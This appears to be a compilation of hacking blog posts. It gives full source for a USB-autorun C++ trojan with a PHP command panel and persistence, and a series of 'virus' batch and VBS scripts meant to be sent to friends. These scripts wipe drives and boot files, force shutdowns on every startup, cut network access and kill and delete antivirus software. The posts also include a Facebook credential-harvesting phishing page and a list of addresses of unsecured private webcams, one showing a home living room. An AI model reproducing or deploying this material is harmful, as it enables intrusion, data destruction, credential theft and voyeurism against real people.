Friday 18 July 2014


Trojan In C++(One Of My Best)

 

I decided to post what I've created here. The trojan downloads 3 textfiles each 5 seconds, the textfiles contain a number, and based on that number it executes commands.

Before we start with the C++ code, I have a very easy way to get the trojan on the victim's computer. You just need a U3-enabled USB drive, USB access to the victim's computer, and the Universal Customizer. Delete the U3CUSTOM.ISO and create your own U3CUSTOM.ISO with these files included:

autorun.inf
CODE C Language
1 [AutoRun]
2 open=wscript go.vbs


go.vbs
CODE C Language
01 Dim FSO,File
02 Dim Date,Hour,Day,Backuppath,Daystring
03 Set FSO = CreateObject("Scripting.FileSystemObject")
04  
05 If Fso.FolderExists ("C:\Windows\trojan") Then
06    Set File= FSO.GetFile("C:\Windows\trojan\winrat.exe")
07    Date=File.DateLastModified
08    Day=DatePart("y",Date)
09    Daystring=CStr(Day)
10    Backuppath="C:\Windows\trojanbackup"+Daystring
11    Fso.MoveFolder "C:\Windows\trojan", Backuppath
12 End If
13  
14 FSO.CopyFolder ".\trojan", "c:\Windows\trojan", true
15  
16 Set oShell = CreateObject("WScript.Shell")
17 oShell.Run "C:\Windows\trojan\winrat.exe"
18  
19 If Fso.FolderExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\") Then
20 If Fso.FileExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Trojan.lnk") Then
21 Else
22    FSO.CopyFile "c:\Windows\trojan\Trojan.lnk","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", true
23 End If
24 End If
25  
26 wscript.quit


Then, create a folder "trojan", and we'll later put the trojan files in there. You also need to create a file "Trojan.lnk", it will be copied to the startup folder. Also place all the neccessary DLL's in there for the program to run, for example urlmon.dll and wininet.dll.


Then create an ISO and run the U3 Updater to put the trojan on your U3 drive. Now it will automatically run go.vbs without any notice once you plug in your U3 drive in any Windows XP computer (It will not work on Vista or 7, they have autorun disabled).






And also, before we start creating our program itself, we need a way to control it. As I said, the trojan downloads 3 files. Let's make these files on our web site/server. Create index.html, assign.html and target.html and don't put anything in there. Then we create a PHP file (edit.php) that is able to edit the html files. Why just PHP and not some normal application? Because this way we can control the trojan from anywhere by just going to yourwebsitehere.com/trojan/edit.php. You can even control computers with your mobile phone if you have mobile internet or Wifi.


<HTML>
<HEAD>
<TITLE>Winrat.exe Control Panel</TITLE>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
</HEAD>
<BODY>
<?phpif (isset($_POST['submit'])) {

$myFile = "index.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = stripslashes($_POST['option']);
fwrite($fh, $stringData);
fclose($fh);

$myFile2 = "target.html";
$fh = fopen($myFile2, 'w') or die("can't open file");
$stringData = stripslashes($_POST['target']);
fwrite($fh, $stringData);
fclose($fh);
}
if (isset($_POST['clear'])) {

$myFile = "index.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = 0;
fwrite($fh, $stringData);
fclose($fh);
}
if (isset($_POST['assigncomputer'])) {

$myFile = "assign.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = stripslashes($_POST['assign']);
fwrite($fh, $stringData);
fclose($fh);
}
?>
<div id="wrapper">
<form action="" method="post">
<textarea name="target" style="width: 230px; height: 25px; margin-bottom: 5px; font-size: 20px">
<?php
$myFile = "target.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
<br />
<textarea name="option" style="width: 230px; height: 60px; margin-bottom: 5px; font-size: 20px">
<?php
$myFile = "index.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
<br />
<input type="submit" name="submit" value="Edit" style="width: 150px; height: 40px" />
<input type="submit" name="clear" value="Clear" style="width: 65px; height: 40px" />
</form>
<?php
echo 'Current hack activated: <b>';

$myFile = "index.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
</b>
<br /><br \><b>1.</b> Just some<br /><b>2.</b> HTML code<br /><b>3.</b> to remember<br /><b>4.</b> what commands<br /><b>5.</b> you can use.<br /><br />
<form action="" method="post">
<textarea name="assign" style="width: 190px; height: 30px; margin-bottom: 2px; font-size: 20px">
<?php
$myFile = "assign.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?> <br />
<input type="submit" name="assigncomputer" value="Assign" style="width: 190px; height: 25px;" />
</form>
</div>





Now we start with creating our winrat.exe, the trojan itself. Here's the source code:


CODE C Language
001 #include <windows.h>
002 #pragma comment(lib, "Winmm.lib")
003 #include <urlmon.h>
004 #pragma comment(lib, "urlmon.lib")
005 #include <iostream>
006 #include <fstream>
007 #include <WinInet.h>
008 #pragma comment(lib, "WinInet.lib")
009 #include <ShlObj.h>
010 using namespace std;
011  
012 int Option, Assign, Target;
013 DWORD WINAPI LowProfile(LPVOID);
014 DWORD WINAPI Option1(LPVOID);
015 DWORD WINAPI Option2(LPVOID);
016 DWORD WINAPI Option3(LPVOID);
017 DWORD WINAPI Option4(LPVOID);
018 DWORD WINAPI Option5(LPVOID);
019 // Add more lines of Option6, Option7, etc. to create more commands.
020 HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;
021  
022 int main() {
023 // Hide Console Window
024 FreeConsole();
025  
026 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);
027  
028 // Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. You can change assign.txt in the PHP file BEFORE you plug in the U3 drive.
029 FILE *istream;
030 if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {
031     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);
032 } else {
033 }
034  
035 // Store Assign.txt in a variable
036 ifstream inAssign;
037 inAssign.clear();
038 inAssign.open("c:\\Windows\\trojan\\assign.txt");
039 inAssign >> Assign;
040 inAssign.close();
041 inAssign.clear();
042  
043 // Start the main loop that is downloading the textfile each 5 seconds.
044 while(1) {
045  
046     // Download Option & Target
047     remove("c:\\Windows\\trojan\\option.txt");
048     remove("c:\\Windows\\trojan\\target.txt");
049     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");
050     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");
051     Sleep(100);
052     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);
053     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);
054  
055     // Read Option
056     ifstream inFile;
057     inFile.clear();
058     inFile.open("c:\\Windows\\trojan\\option.txt");
059     inFile >> Option;
060     inFile.close();
061     inFile.clear();
062  
063     // Read Target
064     ifstream inTarget;
065     inTarget.clear();
066     inTarget.open("c:\\Windows\\trojan\\target.txt");
067     inTarget >> Target;
068     inTarget.close();
069     inTarget.clear();
070  
071     // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan)
072     if(Target == Assign || Target == 0) {
073         if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }
074         else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }
075         else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }
076         else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }
077         else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }
078         // Add more of these lines for more commands
079     }
080     Sleep(5000);
081     }
082 }
083  
084 // Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive.
085 DWORD WINAPI LowProfile(LPVOID) {
086     while(1) {
087         // Obvious
088         TaskMgr = FindWindow(NULL,L"Windows Task Manager");
089         // May popup because of new hardware installation (U3)
090         SysError = FindWindow(NULL,L"System Settings Change");
091         // Windows Media Player may popup. Rarely happens, but had this once at a school computer.
092         WMP = FindWindow(NULL,L"Windows Media Player");
093         // The Removable Disk part of the U3 Drive can open automatically.
094         Disk1 = FindWindow(NULL,L"(D:) Removable Disk");
095         Disk2 = FindWindow(NULL,L"(E:) Removable Disk");
096         Disk3 = FindWindow(NULL,L"(F:) Removable Disk");
097         Disk4 = FindWindow(NULL,L"(G:) Removable Disk");
098         // Autoplay
099         Autoplay = FindWindow(NULL,L"Autoplay");
100         // Errors caused by our VBScript go.vbs
101         VBS = FindWindow(NULL,L"Windows Script Host");
102         if( TaskMgr != NULL) {
103             SetWindowText( TaskMgr,L"DIE!!!! =O");
104             Sleep(500);
105             PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
106         }
107         if( SysError != NULL) {
108             PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);
109         }
110         if( WMP != NULL) {
111             Sleep(1000);
112             PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);
113         }
114         if( Disk1 != NULL) {
115             PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);
116         }
117         if( Disk2 != NULL) {
118             PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);
119         }
120         if( Disk3 != NULL) {
121             PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);
122         }
123         if( Disk4 != NULL) {
124             PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125         }
126         if( Autoplay != NULL) {
127             PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);
128         }
129         if( VBS != NULL) {
130             PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);
131         }
132         Sleep(500);
133     }
134 }
135  
136 //
137 // Here we start with our commands. Option1, Option2, Option3, etc.
138 // Don't forget to also define and create a process for these Options if you want to create more.
139 // Have Fun =D
140 //
141  
142 DWORD WINAPI Option1(LPVOID) { // 1
143     return 0;
144 }
145  
146 DWORD WINAPI Option2(LPVOID) { // 2
147     return 0;
148 }
149  
150 DWORD WINAPI Option3(LPVOID) { // 3
151     return 0;
152 }
153  
154 DWORD WINAPI Option4(LPVOID) { // 4
155     return 0;
156 }
157  
158 DWORD WINAPI Option5(LPVOID) { // 5
159     return 0;
160 }


That's our trojan. But it doesn't have any commands. You can do anything you want now. Run an FTP server in the background (I recommend SlimFTPd), open websites or applications, play a sound, open your CD drive, etc.

GOOGLE'S FIRST SERVER


Wednesday 12 March 2014

Computer Welcomes You

 Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.

Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-

  1. Click on Start. Navigate to All Programs, Accessories and Notepad.
  2. Copy and paste the exact code given below.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
     3.  Replace Username with your own name.
     4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
     5.  Copy the saved file.
     6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
     7.  Paste the file.



 Make your Computer Welcome you at startup

Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Note: For best results, it is recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by following the steps given below:-
  1. Go to Control Panel.
  2. Then click on Switch to Classic View.
  3. Then Click on Sounds and Audio Devices.
  4. Then Click on the Sounds Tab.
  5. Select No Sounds from the Sound Scheme option.
  6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
  7. Click on OK.
Change Sound Scheme to No Sounds

Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.

Around 41 Ways Create Your Own Antivirus


1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


Now Save This Notepad file With Any Name Having  .vbs Extension . 

2 -> Virus Creation Trick  2 .
Open Notepad and write "start" without quotes
Start
Start
Start 

and then save it with .bat extension. 
Now double click on this .bat file to run Command Prompt.

 3 -> Virus Creation Trick 3 
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
 
Save it as "Anything.BAT" in All Files and send it. 

4 -> Virus Creation Trick 4 
Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it. 

5 -> Virus Creation Trick 5 
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.
  



6 -> Virus Creation Trick 6  
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00


Save The Above Code As Anything.bat 




7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next


Save It As Anything.vbs 
 
 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP



@Echo off
Del C: *.* |y


Save It As Anything.bat 

 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File
 
  
12 -> Virus Creation Trick 12 
Change Files To Non-working TXT Files
Save As A bat File


REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

  

13 -> Virus Creation Trick 13 
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File


Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup

Permanently Kill Antivirus

WRITE THIS ON A NOTEPAD
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
 cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

YOR OWN ANTIVIRUS

If you are lazy to download antivirus (let alone pay for) there is another way in eradicating the virus. That is, with "Notepad." Okay, the way he is with a script / code that is typed in notepad, then notepad replaced its extension. Well, other than to eradicate the virus, you can surprise your friends who do not know this. Well, here's how:
Method 1: eliminate or eradicate the virus do you know his name
1.Open Notepad
2.Copy and Paste the code below

@echo off
echo turns of the virus
taskkill /F /IM virusname1.exe /IM virusname2.exe
echo remove all viruses by size
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo remove virus that disguised
echo to drive c and subfolder
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo to drive d and subfolder
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo returns the Document is in the Hidden
cd /d c:\
echo to drive c and subfolder
attrib *.doc -H -S -A /S
cd /d d:\
echo to drive d and subfolder
attrib *.doc -H -S -A /S
exit

Description: virusname1 and virusname2 be filled with the virus name you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat

Method 2: Remove Virus do you know his name and remove any virus bat
1.Open Notepad
2.Copy and Paste the code below

x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin.
click okay to begin".1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert)
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat
del TOR.vbs
del Torjan Horse.Bat
del Torjan Horse.vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
del trojan.bat
del trojan.vbs
del Trojan Horse.Bat
del Trojan Horse.vbs
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert)
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert)
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert")
Description: You can add the name of the virus you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat

Saturday 8 February 2014

BOOST UP NET SPEED

we all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed.however . it's possible to do to some extent and make your internet
much better then it was in the past.

There are Two tricks that will help you to increase your internet speed..


First Method- Speed Up Your Net Speed By 20%


1. First you go to start button

2. Go To Run

3. Type gpedit.msc And Then Hit Enter.

4.Then Expand Adminsitrative Templates.

5.Then Network

6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.

Now You Click On Apply .

That's It Now You Are Done !! :)

Now Just Restart Your Computer . And I hope You will Get change in Your Speed

Some Basic Tricks From My Side-
1. Use IDM To Boost Your Downloading Speed.

2. Use A Good Anti-virus in Your Computer.
3. Remove Unwanted Add-ons, Software,Unwanted Files Form Your Computer.

4.Update Your Drivers Periodically.

5.Keep A Good Maintennance Of Your Computer.

HACK FACEBOOK ID

The way s the easiest and most commonly use way of hacking a Facbook account.

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.




<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>





NOW save this as hello.php

Step7 : now make a account on t35.com and Upload


Login.html
hello.php
lol.txt


IF YOU FACE ANY PROBLEMTEN EMAIL ME I WILL SUGESST YOU TWO MORE WAYS TO HACK:
THIS WAS UPLOAD ON SPECIAL REQUEST OF MY FREIND SHANTANU SINHA
rishabh.tiwari1996@yahoo.com

MORE TRICKS TO HACK WEBCAM

I AM POSTING SOME MORE TRICKS
http://137.229.91.245/view/index.shtml

    A skyview, I think. Might be worth watching in case a ufo or something flies by.

    http://80.26.69.138:8080/

    Eerie lighting, and I keep seeing something moving behind the pole. Probably a flag or something, but who knows?

    http://85.119.14.194/view/index.shtml

    An old church on a hill. Looks straight out of a movie.

    http://195.73.15.148:82/view/index.shtml

    The wind on this cam is crazy. Makes the lights look cool.

    http://66.35.137.235/

    A printing press warehouse. Not going right now, so I have no idea what they print.

    http://home.hepner.net:1955/CgiStart?page=Single&Mode=Motion&Language=0

    Here’s some living room with people playing something in it. No clue what, though.

    http://128.104.138.26/axis-cgi/mjpg/video.cgi

    An ant farm. Could be from a zoo, but I don’t care to dig into the cams right now.

    http://173.165.159.41:8086/cgi-bin/guestimage.html

    A triage room for some hospital. There are people wondering around, but no patients right now. Must be boring.

    http://158.39.49.111/view/view.shtml

    Another sky view. I like raiding my old threads for links to post. It’s one hell of a lot easier than searching google for new ones.

    big boobed gal and her dog:

    http://99.109.136.202/anony/mjpg.cgi

    http://128.196.12.223/home/homeJ.html

    http://62.44.223.185/sample/LvAppl/lvappl.htm

   A little bit creepy. Only a little.

    http://134.29.208.43/axis-cgi/mjpg/video.swf

  aircraft hangar

    http://209.113.157.25/indexFrame.html

    http://128.171.116.64/view/view.shtml

    Cams watching cams watching cams…

    http://cafe-cam.wulib.wustl.edu/view/view.shtml

    A few people studying, I think.

    http://213.211.42.237/axis-cgi/mjpg/video.swf?resolution=640x480&camera=1

    http://allen-construction-webcam.uoregon.edu/view/index.shtml

    A building being built. Well, if it was daytime maybe.

    http://lioncam.una.edu/view/view.shtml

    Here’s a lion cage. Of course, you can’t see the damn things, but the scene is creepy.

    http://kamera-zamek.jhcomp.cz/axis-cgi/mjpg/video.swf?resolution=320x240

    http://axis-784fce.axiscam.net/axis-cgi/mjpg/video.swf

    http://camera.buffalotrace.com/view/view.shtml?imagePath=/mjpg/video.mjpg&size=1

    http://81.8.158.58/view/view.shtml

    A statue or something. The snow is a nice touch.

    http://www.oldetownepetresort.com/cam/suite213.htm

    D’AAWW. It’s a puppy!

    http://www.sverigeinfo.eu/webcams/vindeln_svartberget_2.htm

    A house in the snow. I keep waiting for something to walk by.
    Also, death by chocolate ice cream is bomb, but damn is it sugary.

    http://128.171.104.32/view/view.shtml

    Here’s an odd one with a door. I don’t know what.

    http://66.14.118.60/view/view.shtml

    IT’S JEEBUS! Still, I wonder what the cam is for? Maybe to watch and see if he moves?

    http://lv.raad.tartu.ee:10001/view/index.shtml

    Another statue cam. Fun times out in the snow.

    http://151.97.160.7/view/view.shtml

    ANOTHER strange statue thing. For some reason, I’m just finding these damn things all over.

    http://www.mesto-most.cz/vismo/dokumenty2.asp?id_org=9959&id=4206&p1=1161

    I like the second camera here. It looks like a flowing river. Very peaceful.

    http://89.162.72.203/axis-cgi/mjpg/video.cgi?resolution=CIF&dummy=1306400814056

    This cam shoots all over the place. I caught a car driving by, but that was a few minutes ago, and I haven’t seen one since.

    http://195.200.199.8/axis-cgi/mjpg/video.cgi?resolution=CIF&dummy=1294740006648

    A very smooth camera. Again, it moves around, but the area it covers looks like a foot-path along a river.

    http://www.immobilierenfrance.fr/view/ptzFrame.shtml

    I’m not sure what this is actually. It’s some kind of console, but the only thing that rings a bell to me is a car radio. And it’s not a car radio.

    http://www.nagyegedi-villa.hu/view/bigView.shtml

    Now this is a good one. It appears to be several security cams set up inside and ouside a house. Of course, it looks a little dead right now. It might be vacant, I don’t know.

    http://142.166.240.118/control/userimage.html

    A crane. Above a work place.

    http://cam266949.miemasu.net/ViewerFrame?Mode=Motion&Resolution=320x240&Quality=Motion&I
    nterval=30&Size=STD&PresetOperation=Move&Language=0

